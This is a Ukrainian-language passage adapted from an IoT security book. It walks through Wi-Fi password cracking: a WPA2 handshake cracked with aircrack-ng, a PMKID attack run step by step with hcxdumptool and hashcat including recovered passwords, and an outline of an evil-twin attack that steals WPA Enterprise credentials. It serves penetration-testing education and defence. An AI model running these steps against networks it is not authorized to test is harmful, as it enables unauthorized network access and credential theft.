# aircrack-ng -a2 -b 0C:0C:0C:0C:0C:0C -w list dump-01.cap Aircrack-ng 1.5.2 [00:00:00] 4/1 keys tested (376.12 k/s) Time left: 0 seconds 400.00% KEY FOUND! [ 24266642 ] Master Key : 7E 6D 03 12 31 1D 7D 7B 8C F1 0A 9E E5 B2 AB 0A 46 5C 56 C8 AF 75 3E 06 D8 A2 68 9C 2A 2C 8E 3F Transient Key : 2E 51 30 CD D7 59 E5 35 09 00 CA 65 71 1C D0 4F 21 06 C5 8E 1A 83 73 E0 06 8A 02 9C AA 71 33 AE 73 93 EF D7 EF 4F 07 00 C0 23 83 49 76 00 14 08 BF 66 77 55 D1 0B 15 52 EC 78 4F A1 05 49 CF AA EAPOL HMAC : F8 FD 17 C5 3B 4E AB C9 D5 F3 8E 4C 4B E2 4D 1A
Відновлюємо ПСК: 24266642. Зверніть увагу, що деякі мережі використовують складніші паролі, що ускладнює реалізацію цього методу.
У 2018 році розробник Hashcat на прізвисько atom відкрив новий спосіб злому WPA/WPA2 PSK і розповів про це на форумах Hashcat. Новизна цієї атаки полягає в тому, що їй не потрібен клієнтський трафік; зловмисник може зламати точку доступу безпосередньо, не перехоплюючи чотиристороннє рукостискання. Крім того, це більш надійний метод.
Цей новий метод використовує переваги функцій надійної мережі безпеки (RSN) PMKID, необов’язкового поля, яке зазвичай знаходиться в першому кадрі EAPOL від точки доступу. ПМКІД розраховується наступним чином:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
PMKID використовує функцію HMAC-SHA1 з PMK як ключем. Він шифрує конкатенацію фіксованої рядкової мітки «PMK Name», MAC-адреси точки доступу та MAC-адреси бездротової станції. Для цієї атаки вам знадобляться інструменти Hcxdumptool, Hcxtools і Hashcat. Щоб встановити Hcxdumptool, скористайтеся наступними командами:
$ git clone https://github.com/ZerBea/hcxdumptool.git $ cd hcxdumptool && make && sudo make install
Перед встановленням Hcxtools вам потрібно встановити libcurl-dev (якщо ви не робили цього раніше):
$ sudo apt-get install libcurl4-gnutls-dev
Потім ви можете встановити Hcxtools за допомогою таких команд:
$ git clone https://github.com/ZerBea/hcxtools.git $ cd hcxtools && make && sudo make install
Якщо ви працюєте в середовищі Kali Linux, Hashcat вже має бути встановлений. У дистрибутивах на основі Debian допоможе наступна команда:
$ sudo apt install hashcat
По-перше, ми переводимо наш бездротовий інтерфейс в режим монітора. Для цього дотримуйтесь інструкцій, наведених у розділі Аутентифікація та атаки типу «відмова в обслуговуванні». Потім за допомогою hcxdumptool почніть зчитувати трафік і збережіть його у файлі:
# hcxdumptool -i wlan0mon -enable_status=31 -o sep.pcapng -filterlist_ap=whitelist.txt --filtermode=2 initialization... warning: wlan0mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE................: wlan0mon ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: a4a6a9a712d9 MAC ACCESS POINT.........: 000e2216e86d (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 65165 ANONCE...................: 6dabefcf17997a5c2f573a0d880004af6a246d1f566ebd04c3f1229db1ada39e ... [18:31:10 – 001] 84a06ec17ccc -> ffffffffff Guest [BEACON, SEQUENCE 2800, AP CHANNEL 11] ... [18:31:10 – 001] 84a06ec17ddd -> e80401cf4fff [FOUND PMKID CLIENT-LESS] [18:31:10 – 001] 84a06ec17eee -> e80401cf4aaa [AUTHENTICATION, OPEN SYSTEM, STATUS 0, SEQUENCE 2424] ... INFO: cha=1, rx=360700, rx(dropped)=106423, tx=9561, powned=21, err=0 INFO: cha=11, rx=361509, rx(dropped)=106618, tx=9580, powned=21, err=0
Переконайтеся, що ви використовуєте аргумент -filterlist_ap з MAC-адресою вашого об’єкта під час використання Hcxdumptool, щоб випадково не зламати пароль для мережі, для якої у вас немає дозволу. Параметр –filtermode вносить до чорного списку (1) або білий список (2) значень у вашому списку, а потім або уникає їх, або націлюється. У нашому прикладі ми вказали ці MAC-адреси у файлі .txt білого списку.
В результаті була виявлена потенційно вразлива мережа, ідентифікована тегом [FOUND PMKID]. Як тільки ви побачите цей тег, ви зможете припинити збирати трафік. Тільки майте на увазі, що вам, можливо, доведеться почекати цього моменту. Крім того, оскільки поле PMKID є необов’язковим, воно буде не у всіх існуючих точках доступу.
Тепер нам потрібно конвертувати отримані дані, які включають дані PMKID у форматі pcapng, у формат, який може розпізнати Hashcat. Hashcat приймає хеші як вхідні дані. Ми можемо згенерувати хеш з даних за допомогою потужності hcxpcaptool:
$ hcxpcaptool -z out sep.pcapng reading from sep.pcapng-2 summary: -------- file name....................: sep.pcapng-2 file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 5.2.0-kali2-amd64 file application information.: hcxdumptool 5.1.4 network type.................: DLT_IEEE802_11_RADIO (127) endianness...................: little endian Радиоканалы средней дальности: взлом Wi-Fi 351 read errors..................: flawless packets inside...............: 171 skipped packets..............: 0 packets with GPS data........: 0 packets with FCS.............: 0 beacons (with ESSID inside)..: 22 probe requests...............: 9 probe responses..............: 6 association requests.........: 1 association responses........: 10 reassociation requests.......: 1 reassociation responses......: 1 authentications (OPEN SYSTEM): 47 authentications (BROADCOM)...: 46 authentications (APPLE)......: 1 EAPOL packets (total)........: 72 EAPOL packets (WPA2).........: 72 EAPOL PMKIDs (total).........: 19 EAPOL PMKIDs (WPA2)..........: 19 best handshakes..............: 3 (ap-less: 0) best PMKIDs..................: 8 8 PMKID(s) written in old hashcat format (<= 5.1.0) to out
Ця команда створює новий файл, який можна викликати, який містить дані в такому форматі:
37edb542e507ba7b2a254d93b3c22fae*b4750e5a1387*6045bdede0e2*4b61746879
Цей формат * з роздільниками містить значення PMKID, MAC-адресу точки доступу, MAC-адресу бездротової станції та ESSID. Створіть новий запис для кожної визначеної мережі PMKID. Тепер використовуйте модуль Hashcat 16800, щоб зламати пароль ураженої мережі. Єдине, чого не вистачає, так це списку слів, що містять потенційні паролі для точки доступу. Ми скористаємося класичним списком слів rockyou.txt:
$ cd /usr/share/wordlists/ && gunzip -d rockyou.txt.gz $ hashcat -m16800 ./out /usr/share/wordlists/rockyou.txt OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 970M, 768/3072 MB allocatable, 10MCU OpenCL Platform #2: Intel(R) Corporation Rules: 1 ... .37edb542e507ba7b2a254d93b3c22fae*b4750e5a1387*6045bdede0e2*4b61746879: purple123 Session..........: hashcat Status...........: Cracked Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: 37edb542e507ba7b2a254d93b3c22fae*b4750e5a1387*6045b...746879 Time.Started.....: Sat Nov 16 13:05:31 2019 (2 secs) Time.Estimated...: Sat Nov 16 13:05:33 2019 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 105.3 kH/s (11.80ms) @ Accel:256 Loops:32 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 387112/14344385 (2.70%) Rejected.........: 223272/387112 (57.68%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: 123456789 -> sunflower15 Hardware.Mon.#1..: Temp: 55c Util: 98% Core:1037MHz Mem:2505MHz Bus:16 Started: Sat Nov 16 13:05:26 2019 Stopped: Sat Nov 16 13:05:33
Hashcat вдається витягти пароль: purple123.
У цьому розділі ми обговоримо атаки на WPA Enterprise. Детальний опис зловживань WPA Enterprise виходить за рамки цієї книги, але ми коротко розглянемо, як працює така атака.
WPA Enterprise є більш складним режимом, ніж WPA Personal, і в основному використовується в бізнес-середовищах, які потребують додаткової безпеки. Цей режим включає додатковий компонент — сервер служби віддаленої автентифікації (RADIUS) і використовує стандарт 802.1x. У цьому стандарті чотиристороннє рукостискання відбувається після окремого процесу автентифікації, EAP. З цієї причини атаки на WPA Enterprise зосереджені на зламі EAP.
EAP підтримує багато різних методів автентифікації, найпоширенішими з яких є Protected-EAP (PEAP) і EAP-Tunneled-TLS (EAPTTLS). Третій метод захисту, EAPTLS, стає все більш популярним завдяки своїй безпеці. На момент написання цієї статті EAP-TLS залишається безпечним варіантом, оскільки для цього потрібні сертифікати безпеки з обох боків бездротового з’єднання, що забезпечує більш надійне з’єднання з точкою доступу. Однак адміністративні накладні витрати на керування сертифікатами сервера та клієнта можуть призвести до того, що багато мережевих адміністраторів відмовляться від цього рішення. Інші два протоколи автентифікують сертифікат лише для сервера, а не для клієнта, дозволяючи клієнтам використовувати облікові дані, які можуть бути перехоплені.
Мережеві підключення в режимі WPA Enterprise включають три сторони: клієнт, точку доступу та сервер автентифікації RADIUS. Описана тут атака буде націлена на сервер автентифікації та точку доступу у спробі отримати хеші облікових даних жертви для автономної атаки грубої сили. Він повинен працювати проти протоколів PEAP і EAP-TTLS.
По-перше, ми створюємо фальшиву інфраструктуру, яка містить фальшиву точку доступу та сервер RADIUS. Ця точка доступу повинна імітувати легітимну, працювати з тим самим BSSID, ESSID і тим самим каналом. Потім, оскільки ми націлені на клієнтів, а не на точки доступу, ми деавтентифікуємо клієнтів точки доступу. За замовчуванням клієнти намагатимуться повторно підключитися до цільової точки доступу, після чого наша шкідлива точка доступу перехоплює з’єднання з цільовими пристроями. Таким чином, ми зможемо отримати їхні облікові дані. Отримані облікові дані будуть зашифровані відповідно до вимог протоколу. На щастя для нас, протоколи PEAP і EAP-TTLS використовують алгоритм шифрування MS-CHAPv2, який застосовує стандарт шифрування даних DES, який легко зламати. За допомогою списку перехоплених зашифрованих облікових даних ми можемо запустити офлайн-атаку грубої сили та відновити облікові дані жертви.
Щоб оцінити безпеку систем із підтримкою Wi-Fi, можна скористатися описаною тут методологією, яка охоплює атаки, описані в цьому розділі. Спочатку перевірте, чи підтримує пристрій Wi-Fi Direct і пов’язані з ним методи (PIN-код, PBC або обидва). Якщо так, він може бути вразливим до злому шпильок або атак EvilDirect.
Далі перевірте пристрій і його бездротові можливості. Якщо бездротовий пристрій підтримує можливості STA (тобто його можна використовувати як точку доступу або як клієнт), він може бути вразливим до атаки запитів на підключення. Можлива ситуація, коли клієнт автоматично підключається до раніше підключених мереж. Якщо це так, він може бути вразливим до атаки відомих маяків. Переконайтеся, що клієнт не надсилає довільні запити для раніше підключених мереж. Якщо це так, він може бути вразливим до атаки KARMA.
Визначте, чи підтримує пристрій будь-які сторонні утиліти Wi-Fi, наприклад спеціальне програмне забезпечення, яке використовується для автоматичного налаштування Wi-Fi. Ці утиліти можуть мати небезпечні налаштування, увімкнені за замовчуванням через недбалість. Вивчіть дії пристрою. Чи є якісь критичні операції через Wi-Fi? У цьому випадку відмова в обслуговуванні може бути викликана блокуванням пристрою. Крім того, у випадках, коли бездротовий пристрій підтримує можливості точки доступу, він може бути вразливим до неправильної автентифікації.
Потім знайдіть можливі жорстко закодовані ключі. Пристрої, налаштовані на підтримку WPA2 Personal, можуть поставлятися з жорстко закодованим ключем. Це поширена помилка, яка може забезпечити вам легкий виграш. Для корпоративних мереж, які використовують WPA Enterprise, визначте, який метод автентифікації використовується в мережі. Мережі, які використовують PEAP і EAP-TTLS, можуть бути вразливими до компрометації облікових даних їхніх клієнтів. Натомість корпоративні мережі повинні використовувати EAP-TLS.
Нещодавні досягнення в таких технологіях, як Wi-Fi, зробили значний внесок в екосистему IoT, дозволяючи людям і пристроям бути більш пов’язаними, ніж будь-коли раніше. Більшість користувачів очікують стандартного рівня підключення, де б вони не були, і організації регулярно покладаються на Wi-Fi та інші бездротові протоколи для підвищення своєї продуктивності.
У цьому розділі ми продемонстрували атаки Wi-Fi на клієнтів і точки доступу за допомогою стандартних інструментів, виявивши велику поверхню атаки, яку неминуче піддають радіопротоколи середнього радіусу дії. У зв’язку з цим ви повинні добре розбиратися в різних атаках на мережі Wi-Fi, починаючи від глушіння сигналу і збоїв в роботі мережі і закінчуючи асоціативними атаками, такими як KARMA і Known Beacons. Ми докладно розповіли про деякі ключові функції Wi-Fi Direct і про те, як зламати їх за допомогою злому пінів і атаки на EvilDirect. Потім ми розглянули протоколи безпеки WPA2 Personal і Enterprise і визначили їх найважливіші вразливості. Нехай цей розділ стане для вас орієнтиром для оцінки вашої мережі Wi-Fi.
Ми використовували матеріали з книги “The Definitive Guide to Attacking the Internet of Things ”, яку написали Фотиос Чанцис, Иоаннис Стаис,
Паулино Кальдерон, Евангелос Деирменцоглу и Бо Вудс.